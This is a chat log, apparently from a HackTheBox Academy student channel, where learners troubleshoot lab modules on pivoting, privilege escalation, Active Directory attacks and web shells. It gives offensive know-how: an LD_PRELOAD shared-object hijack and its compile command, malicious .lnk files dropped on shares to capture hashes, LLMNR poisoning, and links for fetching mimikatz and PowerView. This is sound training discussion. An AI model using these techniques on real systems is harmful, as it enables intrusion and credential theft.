But I've already shared a drive from my machine to windows I imagine I could already pass the base through this method
Yes, and the computer in the foreign network (172.26..) doesn't know how to reach your attack system in 10.129.x.y.
can you double check that its actually asking for gobuster? i think it wants you to fuzz vhost with ffuf. if its gobuster, i've had kinda piss poor experience getting it to properly enum vhosts correctly every time ive attempted to do so. ffuf does a better job for that.
yea start of the question says "using gobuster", should i just use ffuf or should i actually go along with what the module says
i dont necessarily wanna spoil the experience ykwim
Go with the module, i think a header needs to be included in there.
just know in real world, i dont think anyone vhost fuzzes with gobuster, though its a great tool and i prefer it to ffuf, it just doesnt like to work right (for me at least) with vhosts
im starting a pwnbox instance ill check for gobuster
see if the header info i mentioned is valid
ffuf requires a header (where to fuzz, vhosts operate on host header directives usually)
it alters host header by default
Perfect through trial and error I can already pass the database to sharing a resource of my machine but I am trying to do it with smbserver.py and I have not been able to
yeah that may be a builtin feature, but i still think you need to target the header, try this -H, --headers stringArray Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2'
something like -H 'Host: FUZZ'
im drawing a blank atm (just woke up, still sipping coffee)
Instead of trying to send the database to 10.129.X.Y, can you try sending it to another computer with which it can communicate. How can you leverage what you learned in the pivoting section to get that traffic back to your attack system?
This is a tough one if you don't have a solid understanding of how computers communicate on a network.
the modules ive done have extensively used ffuf, and my gobuster has suffered as a consequence
im trying not to draw from internet examples because i never had any luck with those but maybe a peek at how they handle host headers may help
I think that in this case it would be necessary to take it to the webadmin host which is the point of support with windows and my attacking machine I think that there should be the most obvious to my perception
ok looks like the host header is not STRICTLY required, so best to leave it off and see what results you get
@shell mason for a sanity check remove the --append-domain from your cmd, and add a -v (for verbose i think?) and check for HTTP status errors or content lengths some filtering may be required
not sure about that 99.8% stuff
if you're seeing a ton of 3XX or 4/5XX errors, (specifically 300s and 400s) you'll need to filter for those in some fashion, either by code or content length(s)
Anyone who has taken the Password Attacks module? I really need some help
yep, a few weeks ago just. where you at?
my fault OG
I think thats a diff password cracking module, i didnt recognize the specific part you were on
someone else whos worked that one will prob be around soon who can better help.
@quiet trout that
You can send me a DM.
On the API Attacks -> Info Disclosure section a tip is provided for bypassing rate limits with a code snip:
https://academy.hackthebox.com/module/160/section/1474
```
<?php
$whitelist = array("127.0.0.1", "1.3.3.7");
if (!(in_array($_SERVER['HTTP_X_FORWARDED_FOR'], $whitelist))) {
    header("HTTP/1.1 401 Unauthorized");
} else {
    print("Hello Developer team! As you know, we are working on building a way for users to see website pages in real pages but behind our own Proxies!");
}
```
i understand what its doing, but not why... if the HTTP_X_FORWARDED_FOR header does not match the whitelist, and sets the 401 status, does the web server recognize this? is that all that's necessary to return a 401? why wouldnt the web server return a 201 with the 401 unauth header? is that not how it works? is setting the http header all that's required to return a status code? (alternatively could a custom 404 page be returned with a 201?)
nvm chat gpt gave me a stomachable answer. it looks like the web server does handle this as one would expect and it is technically possible to send conflicting responses but it apparently overrides any default response the web server would send.
stomachable answer, imma use that
is there a way to reset module progress if i havent touched it in months and want to start over?
yeah it also works as a precautionary flame suit in case chatgpt gave me total bullshit, which is usually the case.
I don't think there is an option for that.
You could always reach out to support and see if that's something they can do.
yeah fair enough. i guess i could also just try not to look at the answers
Depending on where you are some section questions and answers have been updated, so those answers wouldn't match up. But yeah I mean that should work.
The steps leading up to the answer are just as important
so take the chance to make good notes
Did anyone finish SA 1 from intro to whitebox? I managed to get the auth token, and I think I know where the ||code injection|| is, but I do not know how to extract the /flag.txt from it
Module: Network Enumeration with Nmap
Section: Host and Port Scanning
Hey, I'm really struggling with the second task in this section:
Enumerate the hostname of your target and submit it as the answer. (case-sensitive)
I've tried using the following flags:
-A
-sC -sV
and I got some kind of a flag, but it's not the correct answer. What am i doing wrong?
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-23 08:09 CDT
Nmap scan report for 10.129.2.49
Host is up (0.0087s latency).
PORT STATE SERVICE VERSION
31337/tcp open Elite?
| fingerprint-strings:
| GetRequest:
|_ 220 HTB{SOME-FLAG-HERE}
Module: Linux Privilege Escalation
Section: Shared Libraries
Link to section: https://academy.hackthebox.com/module/51/section/475
Can someone please explain to me in what scenario the privilege escalation method discussed in this section would not work? Or does it always work as long as the user has sudo rights (this doesn't sound right)?
If you've used the flags -sV -sC -A, then I have a good feeling that the hostname is likely in your output. Have you checked the output properly?
There is a flag, but when I copy it into the reply box it is incorrect
The question has asked you for the target's hostname, they never said flag.
the user need to have rights to restart a privileged process that reads shared libraries from the libraries env path
tbh I've not seen this vector outside of this exercise
Wdym by "libraries env path"? Are you referring to the LD_PRELOAD variable?
yeah
I have noticed something different. When I run sudo -l, I get this in the output env_keep+=LD_PRELOAD. Do you think this is a good indication to try out this vector?
I see.
probably, but yeah this is not common
Understood, thanks.
Btw @next bronze the Linux priv esc module has a suggested completion duration of 8 hours. Is it just me or does it take a lot longer than that?
pretty sure it took me more than 8 when I did it
Ahh okay, good to know. I thought it was just me, I've been on it a couple days, not doing it all day though, have had other things come up.
yeah just take your time, the suggestions are just suggestions
Got Windows Priv esc after this
Module: Linux Privilege Escalation
Section: Shared Object Hijacking
Link to section: https://academy.hackthebox.com/module/51/section/476
In the section there's this command:
cp /lib/x86_64-linux-gnu/libc.so.6 <REDACTED>
Is the .6 in /lib/x86_64-linux-gnu/libc.so.6 a mistake?
Hi
im doing "using the metasploit framework module." (section modules) and im stuck in this exercise:" Use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents as the answer." no matter how I try, when it comes to exploit part it always showing : Exploit completed, but no session was created." can anyone explain me why?
I believe there are couple of EternalRomance exploits in metasploit, make sure to try them all, and make sure to set the options correctly, like LHOST, LPORT, etc...
https://academy.hackthebox.com/module/67/section/630
Section: Interacting with Users
Help, I don't understand at all what to do in this module. He breaks my might.
I don't understand how to get a hash.
Which was the hardest module for you in the pentester path?
I tried everything but no results
make sure that VPN is connected properly
For info-gathering web edition does anyone have any clues to answer the skill assessment "What is the API key in the hidden admin directory that you have discovered on the target system"? I ran dnsenum, ffuf and ffuf recursively along with gobuster
If you want a nudge DM me , with the steps that you have taken so far
this section focuses on the idea of stealing credentials in unique ways in Windows environments, from the hint it asks you to find a writable share by the current user (Netexec & CrackMapExec are great tools for that purpose)
Hello everyone, I am stuck and struggling to find informations on the module "Dynamic Port Forwarding with SSH and SOCKS Tunneling"
https://academy.hackthebox.com/module/158/section/1426
I have an issue with proxychains, as I have all hosts down when I scan the target with nmap after having a dynamic port forward made with ssh -D 9050 ubuntu@[IP]
then I either use -Pn on a specific open host, and I have no services up, or I try -sn with a range
Thanks in advance
Ah, thanks. I also just noticed that it wasn't a mistake.
uploading something in that writable share will trigger another thing in responder then you should easily get the answer to the question
nothing
Yes, I kind of do it.
I just got something, I use the 3rd method. But I capture my own logs.
you should upload a Malicious File to any writable share available and wait couple of minutes, and smbclient is a great tool for that
the problem is that I don't understand which file to take for the attack
you only have a handful of them used in the section, upload all of them and one will certainly work, wait couple of minutes for the trigger to take place
make sure you upload in the right place
and this is not the one
How should I understand which folder is in this module? right
C:\Department Shares\Public
you could try
I download all the files through this folder
I have serious connectivity issues with modules. Where should I direct that?
Need to speak to a person? Learn how to reach our support via HTB Labs.
That's not my problem. The problem is that reading the module, I don't understand how to use what they want in the module. Whether it's Generating a Malicious .lnk File
you need to generate a malicious .lnk file , then make your target running it as simple as that
I think i got a flag the wrong way, could someone point me to the right direct way?
Got the credentials to the user and to find the ip of the referred machine i scanned the network with nmap, found 3 hosts and rdp'ed to first one
Although given the flag i should have ||audited group memberships||.
yeah that's fine
I didnt audit any group memberships though, what did I miss then?
Can you tell me in which folder the file should be uploaded? I don't understand what folder is needed for this module. I just don't see it in the module description or on the C drive
you should find it yourself
Should probably read up on the exploit you're performing and why it works in the first place instead of asking for direct handholding.
nothing wrong with asking for help
Tbh if u got the flag that's the only thing that matters 
Hi im stuck on the OSINT: Corporate Recon > Cloud Storage Question: Investigate the website and find the bucket name of AWS that the company used and submit it as the answer. (Format: sub.domain.tld)
I have been looking in on the website source code and using tools like ip2provider but am unable to get the bucket name of AWS the inlanefreight.com uses.
you can check after to find out why your way worked
check the website source code, grep for s3
yep
Got no output
just used the same method on a couple other pages on the website and found it thanks for the help @next bronze
btw I figured out how to solve my problem of 'resetting' the module. I used TamperMonkey and GPT helped me write some JavaScript to blank completed answers out unless I hover over them.
Please can someone help me with this question in the broken authentication module On what do password recovery functionalities provided by web applications typically rely to allow users to recover their accounts?
I cant seem to find the answer
Reread that section. The answer is there.
Please can you give me a hint on where to look ive read and re read the section but cant find it
Maybe try to keyword search for it. If you don't understand what I mean by that let me know.
Hey. Welcome. Read #welcome and it'll explain why and tell you exactly what to do
hey goblins frnd
nice to meet u
Nice to meet you too
wish i were goblin friend
Hey @rustic sage
nice to be here
bet
Lol
Hi there, I am currently doing the "Active Directory Penetration Tester" path. Is the knowledge gained here good for OSCP?
IIRC that path is out of scope for OSCP, but i could be wrong
its overkill for OSCP as far as I know
Can some one help me with the Pillaging module?
**Find the configuration file for the application you identify and attempt to obtain the credentials for the user Grace. What is the password for the local account, Grace? **
Tried the example with the 6 available password nodes in the confCons file and their backup
If I would complete the path, OSCP should be easier? Or is there way different stuff being explained in this path?
yep definitely out of scope
I think CPTS is more relevant in that case
you'll be learning stuff that likely won't get tested
Ah ok thanks guys!
Can I ask for module help in this channel?
yes
That knowledge is beyond OSCP
The command I mentioned earlier, in the module section... why does it copy libc as libshared??
certainly beyomd.
lol
i liked that typing fumble.
or typo
this happen all the time with me.
yeah , I made too much typos
some time make bor of bro
check the previous command, the binary is trying to load libshared.so
I don't get what you're saying?
I can see that libshared.so is one of the dependencies. Why is it copying it as the name of another dependency though?
it's explained in the section
Oh, is it so it throws the error about dbquery()?
And then we can redefine it to suit our needs?
yes so you know which function it's trying to call, and you can make that function a shell or whatever
Got it, thanks. Sry for the trouble.
technically you can just decompile the program too
or do a strace
Oh, noted. What would you use to decompile?

lol there's an emoji for that?
In what instances does this privilege escalation vector not work?
if you can run the program as sudo, or if it contains some important data you can exploit or if it communicates with other important processes
but that's going into RE as you'd need to understand what it actually does beyond just making it run a shell
That's quite a wide range to cover.
yep that's binexp and RE, for cpts you'd just need to understand the scenario given in the module
Also, the question at the end of the section has already carried out all the steps? So, I have to delete the library it compiled if I want to redo the steps?
has it? you can compile a new one
Yeah, apparently so
I just redid it, so it's all good.
I chatGPT'ed this command but I still don't quite get it. Do you happen to understand the parameters?
gcc src.c -fPIC -shared -o <REDACTED FILE PATH>
-fPIC and -shared specifically.
when in doubt consult the manual
https://gcc.gnu.org/onlinedocs/gcc/Option-Summary.html
but -shared is to create a shared library .so file
Read it and now my brain hurts 🤣
Seems to work even without the fPIC flag 
Prolly best to stick with it though based on the little I understand from GPT's explanation.
Hello All,
I'm new to HackTheBox, Is it safe to download files directly to my local laptop, or is there a risk of spreading malware? I'd appreciate any suggestions on how to download them safely.
Bro what are u asking it?
Just doing my best to understand what it is I'm running
Atleast you going in the right direction
From what I understand, fPIC makes the shared library be able to get loaded from anywhere in memory that the program chooses.
That's why this worked without it, because only one program was using it at that time. If multiple were using it at the same time, there would probably be a memory conflict
https://academy.hackthebox.com/module/67/section/1637
Question I'm right to go to the site through my browser. The second I don't see as in example "d" cookies. After looking at other cookies, I also did not find anything suitable
you'll need to add it yourself after extracting them from the target
It's just that the task also says that I must use a browser on an RDP connection. But there is no Internet there.
well have you tried accessing?
what's the domain given in the question?
I understand what you mean. I'll try.
do you guys also think this is a rabbit hole

inlanefreight .slack .com I tried how it was on one of the examples. But it still doesn't work
regarding API enumeration, some of the API labs have you start off with a get req and/or curl -X OPTIONS ... to the api endpoint... is the info returned (if any) to be understood as options for the entire API? all endpoints belonging to the API? (you wouldnt say... curl -X OPTIONS ../api/userinfo or ../api/groupinfo and expect differing http methods allowed/disallowed on different endpoints?)
added into the hosts?
on rdp no internet
It's just that the task tells me what to do via RDP, and when I do it through my browser, I don't capture the cookies I want.
I need help with Zephyr initial foothold. Anyone?
wrong channel
a month ago i had a link from snapchat and i could put in peoples old usernames and it would show their new usernames they changed it too does anyone know what this link is?
I'm getting a bit fed up with RDP on AD machines...
[16:05:28:351] [83225:83226] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[16:05:28:351] [83225:83226] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[16:05:28:351] [83225:83226] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
Doesn't matter if I try immediately after spawn, 10min after spawn or 45min...
Any idea?
Command was: xfreerdp /v:10.129.253.234 /u:htb-student /p:'Academy_student_DA!' /dynamic-resolution
well i also got disconnected from the rdp and not connecting back
trying to get new ip and see if that works
Already went through 4 reset, let me know if you get in
Guys need help with this before i go to sleep i got this flag but its not accepting {e4...2a}
Is there any reason why
Cross-Site Scripting (XSS) -> DOM XSS -> Questions
returns two flags, one of which is correct?
isn't the point of this exercise to upload the file on win and unzip there?
can try by submitting both? how's that idea?
Yes it is
its same on my base machine and on RDP win too
I have completed the task. I need to know if there is any technical purpose or something like that.
ok got it for that i can't answer i hope someone will respond to your request.
That might be a flag for another section
can i dm?
Sure
Just had one question about this part.
is it normal for sharpup.exe to show you that you can modify a binary and when you check that binary you find its not permissible to you to (stop,write,modify) the service only start and execute (its been the case with manual operations as well)?
Hello! I'm having some trouble with the Bash Scripting module at flow control - loops. I can't get the code to work...
for i in {1..28}; do
var=$(echo -n $var | base64)
done
salt=${#var}
I get something like bad decrypt
If someone can help, that would be very much appreciated
Is that the whole code?
you define var with var, is it initialised for the first iteration?
ways to transfer file from windows to kali?. smbserver is not working.
base64 / scp / webserver + wget
https://academy.hackthebox.com/module/67/section/1637
I need a hint. I got a backup, but how do I get a hash. I understand I need to send a SAM and SYSTEM file to my Kali but I can't find a way how to do it.
The for loop is the part I've added. I even tried it for each i, but it still doesn't work
Take that to DM please.
can you give me a hint
I cannot, sorry
If you're having issues with a specific section or module, I'd recommend reading back over the training material, taking notes and applying it to your attempts on the evaluation steps.
So I read the module again. But it doesn't say how to get a hash after we made a backup
wassup guys , day 1 vip, not having the best of luck with my first module.
I have gotten many answers with many scripts but none of them work
Hey, can someone help with Windows PrivEsc skills assessment 1?
does not start with e
You can DM me what you have tried.
@acoustic owl You have powers now?
In windows priv esc communication with processes
At the end they just tell you about named pipes and link a msf exploit Without showing privesc?
unable to run rubeus.exe. it says this version is not designed to run on this system. Tried powerview script. it also shows the hell of errors. doing ad enumeration skill assessment
<@&861185840277487616>
funny amount of errors, when running powerview.ps1
It should work, unless you had a problem in uploading file or you are using a very old powershell version
Can anyone help me with the noSql injections skills assessment 2? I am very stuck.
Does anyone have anything that can help me complete Intro to assembly language skills assessment question 2: I've been on it for 2 days. I'm able to send the shell out to the listening port on the target server but it fails to run.
Got it
you wgetted powerview wrongly, looks like you're trying to invoke some html
your rubeus binary might be compiled for the wrong .net version, where did u get it from?
Sounds like you didn't download the right file. I see this happen when this https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 gets downloaded instead of this https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/refs/heads/master/Recon/PowerView.ps1
Hey can I get some assistance on the Public Exploits section? I've checked the ||IP:PORT and found the relevant webpage which tells me there's a simple backup plugin 2.7.10 running when searching I was able to find a module named "WordPress Simple Backup File Read Vulnerability" however running this doesn't seem to get me anywhere|| not sure if it's a misconfig of my RHOSTS or what but I suspect I may have not found the right exploit for the vulnerability.
https://academy.hackthebox.com/module/77/section/843
can you type 'options' and show the settings?
and the RHOSTS matches the target you spawned?
yep
it seems to run and then say module execution completed but I'm not sure where to go next
when you run it, does it say successful and show you the saved file location?
the first time I ran it I did get a file saved
so it sounds like it worked
when I opened it there was quite a bit of info in there
you can change the FILEPATH option to change it to another file
it saved it locally
you're on the right track, it worked.
so now instead of reading /etc/passwd, what file are you looking for here?
error while running mimikatz. downloaded it from https://github.com/ParrotSec/mimikatz/blob/master/x64/mimikatz.exe.
wooohoo thank you @cloud urchin!!
Looks like you can't use that one with that OS. I'd recommend making your own folder with various common tools, it'll save you a lot of time in the future. When you're working through the modules you can grab the executables that are in the c:\tools folder. Another good binary resource is https://github.com/r3motecontrol/Ghostpack-CompiledBinaries.
Also if the link you provided is the literal link you used, you need the raw link. https://github.com/ParrotSec/mimikatz/raw/refs/heads/master/x64/mimikatz.exe
Thanks brother. I will do as i get free after the module. Also it fixed the problem. how did u generate the raw link thou?
visit your link in your browser, it's not actually the binary you can download. It's a github page that shows the code, but since that's a compiled binary it won't show anything. in the upper right there's a few download links, one of them is "raw" which gives the link i gave you.
No, you don't need to complete those modules to complete the Penetration Testing Process module, if that's what you're asking
well, you will definitely need to know the fundamentals to complete the course/path. depends on your starting point.
if you know how to cd into a new directory and where the passwords are stored on each platform, you don't really need these
The web apps part of CPTS was probably the roughest part for me. Everything in the exam is within the modules though (although some things definitely required external research), so just make sure you have a good understanding of what to look for.
I just finished this myself. Was hard work figuring it out for sure
guys i'm doing the skill assessment of pivot module i found the id_rsa and i dynamic port forwarding with ssh but i can't find any up host with nmap "proxychains nmap -sn 172.16.5.1-200"
Where can i find reports or articles on attacks using certain CVEs,i don't want an explanation to the CVE, i only want attacks that exploited a certain CVE
I believe that's because raw network packets like ICMP don't work well with proxychains
try -sT instead of -sn
which mod here can't read japanese?
Your name was all non-English characters. So it was changed according to rule #10. If you verify your account, your HTB name will show
same thing it says socket error or timeout but its says ok for 172.16.5.15:80 which is the given machine
sounds like something's wrong with your connection or proxy then, did the machine die?
i found the ip for the second machine by looking for the response time after the scan done and i can port scan it but i can't ping it or find it with ping sweep
ping is ICMP, it won't work through the proxy
how then i can enum the internal network ?
nmap common ports across the subnet
this will take forever especially on big scope
if you do all ports yes
common ones, less likely., or if you are looking for a particular service scan for just that / only a few common ports
even with just top 1000 will take forever because the proxychains maybe i will try different port like 443 instead of 80
Hello, I need to ask I almost finished the enum & atk AD , can I go to start zephyr?
You can use the host system you're connected to to do a ping sweep. Either cmd or powershell etc. Then once you find the IP's that reply, you can narrow down your targets. Then use something like --top-ports 25 in your port scan... if nothing returns, expand it to 50 and so on.
hello i get error in Windows Privilege Escalation Skills Assessment - Part II and i need help Program 'CVE-2020-0668.exe' failed to run: The specified executable is not a valid application for this OS platform.At
line:1 char:1
how solve this problem "This app can't run on your PC" in Windows Privilege Escalation Skills Assessment - Part II to can execute CVE-2020-0668.exe
If that doesn't work, try with another vulnerability
i wrote this down thanks man and maybe also will try to use metasploit its has module do ping sweep
Module: Login brute forcing
https://academy.hackthebox.com/module/57/section/491
Question:
Using what you learned in this section, try to brute force the SSH login of the user "b.gates" in the target server shown above. Then try to SSH into the server. You should find a flag in the home dir. What is the content of the flag?
How am I supposed to brute force when password auth is not supported?
check which port you're supposed to use
Thanks
port is also a case but it seems bro is making same mistake as i did, by not reading the question properly.
What do you mean?
it is not exactly a mistake but a waste of time i guess.
but it shouldn't take much time
Using wordlist instead of b.gates?
Took 90 sec
i can not run any tool like sharpup i will get same error
You can try doing manual enumeration
i'm stuck at the pivot skill assessment i connected to the first window machine and found the user fra** but i can't find his creds also found two ip in windows internal network but i don't know how i can scan them with nmap to see the ports i tried to use msfvenom and ssh -R to try to reverse connecting but that didn't work
This is the toughest lab so far in CWEE. I am spending some time around this
https://academy.hackthebox.com/module/189/section/2022
I have reset the password for Admin user. Now when I login it is going to MFA screen
Hi everyone, did it ever occur to anyone that CME fails to recognize a password when in reality that password works out?
I've been trying to auth to RDP with cme with a working password, however on RDP it simply failed (the password had special characters, shall I wrap it in apexes ?)
Then, completely out of curiosity I've tried to use cme on a smb server with the same password list and a given password worked out for that user. Just to try it out I used it in RDP and it worked. So at this point I'm wondering whether I shall rely on cme anymore or not
it will show you what password was actually used in the output
wait, I think i didn't get your point. To sum it up, what I mean is I could login with a password that CME returned as "not working"
CME will tell you what password was actually used, so you can make sure that's the password you want it to use
since you mentioned that there are special characters
also I'm pretty sure CME's RDP implementation isn't reliable, use netexec instead
which means that if nobody ever logged on a given service it does not return as valid?
In my use case could it be that the user logged on smb but never on rdp ?
huh that's not what I said
whether a user can logon to a service depends on the user's rights
But then at this point I don't think that's too clear to me.
Assume I have user A password B, combination with which I've already logged on RDP and works.
Ideally, CME should return, given a username list with A and a password list with B, a record saying that this combination is working
^^
if it's the same username and password and it's not showing up in cme, try with netexec instead
alright, then it makes sense ahah
Thanks for the clarification!
also generally password spraying rdp is slow and pointless, you would've known which creds are valid through other services and after that it's easy to identify which user can rdp
to connect to the target
because you have no route to the target. your vm and the target need to be tunnelled on the vpn. try to ping the target IP, what response do you get?
and why might you get that? you need to connect to the vpn you have no route to the target box
On the Hacking Wordpress Module https://academy.hackthebox.com/module/17/section/88
Can someone help me understand why im not getting results from a curl -L http://94.237.61.58:51042/wp-content/plugins/mail-masta or wpscan http://target... but when i browse the page in the browser i see the dir listing just fine...? this is wild, the module even goes into examples that sorta suggest you should use these tools (vs manually w/ browser)
oh wait, i guess wpscan requires an API token
that info would've been nice to know in advance
still doesnt explain my curl issue though -_-''
Get-ExecutionPolicy | Set-ExecutionPolicy ?
or is that what -ep bypass does? check anyways?
import the module
put a slash at the end of the url
thx just caught that, thats what i get for trying to type the cmd out i guess >_<
thats pretty cool actually, wasnt aware of that. it lasts just for the ps session?
neat, ill have to put that one up my sleeve for later.
in the wp hacking module:
https://academy.hackthebox.com/module/17/section/90
we're bruting logins and we're using SOAP method calls.
in a previous module on API attacks we're shown that the WSDL can be obtained via
curl http://<TARGET IP>:3002/wsdl?wsdl
is there a way to do this on wp? drawing a blank since the API is slightly different..
nvm looks like you use a slightly different variation on that, with a POST request and a specific method call
Hi guys, since I'm still relatively new to pentesting, I've got a sort of peculiar question, probably, but I'd like to have the feedback of those more experienced.
Technically speaking, even though we're trained to perform privilege escalation, we can also directly access in r/w mode some critical points without accessing as a sysadmin.
Is that already considered enough for the purpose of a pentest? Do we actually require to provide the proof that we logged in as root / system to properly confirm the pentest success?
I'll highlight the following case that just happened to me (so far since I'm at the beginning is the first scenario I happen to be in this situation, but I guess there'll be tons of them in the future).
I could get inside a linked server and leverage xp_cmdshell to properly execute commands as NT AUTHORITY\SYSTEM.
At this point, rather than finding a way to login as Administrator I simply read the flag by accessing the file through the xp_cmdshell.
Is this already considered enough, when performing a pentest?
so a pentest in a hired engagement consists of more than just the "box pwned" if you find a access like you describe it should be noted, then continue on to other attack vectors
that's also true. Thus in this case it'd be necessary to notice, for instance, that I can exec commands as SYSTEM and I can exfiltrate SAM dumps and so on
yeah you describe the weakness explain what you can do with it in exhaustive detail and move on
depends on the scope of engagement, are there other target behind the mssql server that you have to reach? if yes then carry on. if the goal is only to find vulnerability in that server, then getting command execution as system is enough. of course flag out the cmdshell thing and mssql service is running as system
being able to exfiltrate SAM and whatnot as system is not a vulnerability
good point.
Yea I guess that's just a consequence of the vulnerability found. In first place I shouldn't be able to be SYSTEM on a unknown machine
Could someone help me with the nosql injection skill assesment 2 ? Im kinda stuck
Hey guys, i have a question about the shells and payloads module, im at the infiltrating windows section, i already have the right answers but i want help to gain access on another way, after scan i saw an open port (80) so i navigated to it and saw that i can upload files, i guess that i also can gain access by uploading a payload that i can make with msfvenom no? If yes can somebody explain me how?
like how do i know which module to use, looking for the required options etc
If I recall correctly you're able to upload a php file. Then if you can access the directory where those uploads go, and access that php file, you've got remote code execution. Look to use php reverse shells, web shells or use msfvenom to create one. I'll pop my notes to see if I took that route and there's any more nuance to it.
i think you talking about another part (web shells section) no?
Maybe. PHP can run on Windows, but it works the same if it's ASP or whatever language. Or am I misunderstanding the scenario?
I don't have any notes for that module with me, but I'll see if I can pop the box up and take a peek
Ok, yeah it works with antak webshell which you can probably find somewhere under /usr/share. How to do it with msfvenom... let me see.
Is it me or just in the Skills Assessment 2 of AD Attacks & Enum there is a whole win priv esc section that is not taught NOWHERE in the module and you have to go through the corresponding module before ?
@tender nimbus well, yes, you can do it with meterpreter too. Is that what you were asking or am I answering totally different questions?
i think you got a part right, what i mean in the infiltrating windows section (not the webshell section) is that there is an open 80 port and you can upload files, what i want to do is upload a webshell but i guess i gonna see how to do it in the webshell section
the thing i always wonder is how do you know which exploit to use there are so many of them
I am in Shells & Payloads > Infiltrating Windows... but, yes, you'll learn to use the antak shell in the upcoming webshell section.
You just have to know what language you're working with to select a shell. If the webserver is processing PHP, ASP[X], Python, Node... whatever, just gotta select a shell, exploit or payload that is in a matching language.
so in this case php bcs the language of the webserver is php right?
Hey guys, for the windows privesc assessment part 1 , Last question, find the confidential.txt file, do i need to escalate to dc or not ?
I was wrong the first time around, in this case it's ASPX, not PHP... but you've got the right idea.
okej thank you ^^
i dont see any user when executing enumdomusers rpcclient command i setup a linux VM and running samba on it . which is not a domain joint vm its standalone vm .
can i enumerate users on a standalone machine with anonymous access to SMB
@shut vapor can you help me with that too?
where do you see that its located in \files?
i only see C:\inetpub\wwwroot\status.inlanefreight.local\files\demo.aspx
Did you upload demo.aspx? The section suggests that is the file you're uploading. If so, then \files\demo.aspx is it, right?
yes i uploaded it and i found it but i don't understand where they see the \files\
there is only one \
bcs when i search status.inlanefreight.local/files/demo.aspx i also find my webshell
I'm not sure I understand. Is your question "how would I know to look in \files?"
when you read the post they say "As seen from the last image, our shell was uploaded to the \files\ directory, and the name was kept the same." but there is no \files\ on the image ^^
I'm firing up the lab now to take a look and see if I can jive the conversation.
its double \ i cant write it here it disappears
I don't know why they say \\files. I think that's shorthand for "the current url", like if you were writing html -- a relative directory. But the image does show you where the file is going:
Also, to get a backslash (\) in discord you have to escape it with two backslashes (\\).
Hello guys, I'm having a small problem with one module. Should I ask about it here?
Yes
okej thanks mate
Now try 4 backslashes in a row(\\\\)
lol got it
thanks
In Windows Fundamentals in Introduction to Windows I can't get the right build number despite trying different formats. Am I looking at a wrong number? Neither 19041.1 or 10.0.19041.1 works.
Got to jiggle the answer. Try "10.0.19041" "Version 10.0.19041.1", "19041" etc.. Let me see if I can figure it out on my end too.
use systeminfo it will tell you the build no.
it's the number after the major and minor version
It gives same numbers but they are not accepted as correct.
I mean
Wait, I tossed random tries and 19041 worked
yes and it's shown in your screenshot
This is the better answer. Often versions are <major>.<minor>.<build>.<revision> or follow some similar structure
build 19041
Makes me wonder why all these ways to get build number give somewhat different number
Anyway, thanks guys!
It's kind of a moot point. If someone were to ask you what build you're running and you gave them the full version (10.0.19041.1) they'd know from the response. Further down the line when you're evaluating if an exploit will work against a version of windows, you'll need to know the build and quickly learn that 19041 is the value you need to compare.
Ok. Thanks for explaining.
I cant see to find any exploit for it to get a reverse shell as said is needed to get the flag any help ?
message deleted due to spoiler
hhi
Hey Everyone!
Hi. Welcome
?
I am doing AD Enumeration and Attacks module and trying to get the SID of a user for ACL enumeration. According to the module, $sid = Convert-NameToSid wley should work after importing powerview.ps1 but it's not giving me any output after running this command. I got the SID using the Get-ADUser cmdlet but want to know why the $sid one isn't working.
can someone help me figuring out, what i am doing wrong ?
this blog might help in acl or ace
what is happening here
i dont know about what u r doing wrong but yeah this blog really put some good info on acl and manually enumerating it
Thank you for sharing that blog, i will take a look at it. I have shared a screenshot in which you can see the $sid isnt working.
you're simply saving the sid into the $sid variable
next you'll need to do something with that variable
ahhhh make sense, i am just being dumb lol
yeah
thank you for the help mate!
just print it take a look
i dont see any user when executing enumdomusers rpcclient command i setup a linux VM and running samba on it . which is not a domain joint vm its standalone vm .
can i enumerate users on a standalone machine with anonymous access to SMB
I mean enumdomusers is enum domain users
yeah but it is not showing any output and its a standalone machine with any domain involved
also samba works slightly differently compared to windows smb, the shares and stuff are the same, but different when it comes to users and domains
in HTB modules they are also using a linux machine
https://academy.hackthebox.com/module/67/section/637 Windows Privilege Escalation Skills Assessment - Part I
I need a hint. How do I transfer a file to escalate privileges?
use python http server
or base64 encode the file content and decode on the other end
the problem is that I can't write files
Try an area that usually allows global write, like Tasks, Temp, etc.
Working through the SCCM module in the AD path, the text says "Finally, the boot media can be requested with PXEThief and decrypted with the password. Generally, many interesting values exist in PXE media, such as the credentials required to enroll new computers into the Active Directory domain. These credentials are useful for initial access:"
How would one recognize or enumerate an SCCM Distribution Point to be able to begin with the 2nd pxethief option? Or would you start with the auto-discover option on an engagement? I know with credentials they can be found with something like sccmhunter
Wow
I have a quick question about AD Enumeration & Attacks - Skills Assessment Part II 2
The first thing you do to get a foothold is listen with responder from an internal linux host and capture a hash.
Later in the module, when you have admin creds to another machine, you do something similar to listen with LLMNR poisoning on a specific windows host in the internal network.
I'm under the impression that LLMNR poisoning works by intercepting internal network broadcast requests
My question is: Why is it that the linux host running Responder (on the internal network) captures a specific hash, say for userA, and for the second hash we listen with inveigh on a different host on the internal network and capture the hash for userB? Shouldn't responder on the other linux host be just as capable of capturing this hash for userB? Do i fundamentally misunderstand how LLMNR poisoning works?
I'm just trying to understand why this worked, and how I would be led to doing this myself in future engagements. Is it a good practice to listen with an llmnr poisoner if we land ourselves on a new machine in general?
If I understand correctly, the second time it is unicast, specifically sent to that machine only, not broadcast. You can try to capture the traffic to check if that is the case, I may be wrong
From a methodology standpoint, if that's the case, would it be a good idea to setup inveigh and listen for challenges when we land ourselves on a new machine internally?
Maybe I just ought to read up more on LLMNR nbtns poisoning
I just feel like I wouldn't have ever figured this out myself without heavy guidance from hints and looking through previous discussions and that's a problem
Is there a document that covers msf directories? Like auxiliary(handler,etc) exploit(Linux, etc)
Like a tree?
I think HTB wanted to drive this point to the student. If we land on a new machine, that machine may be on different network segment, so it's worth running inveigh there too. LLMNR poisoning unlike DNS requests do not cross network segments, so each segment could have different requests.
btw I did the same thing as you, I felt like htb did not really explain LLMNR much, so I looked into microsoft documentation for more info
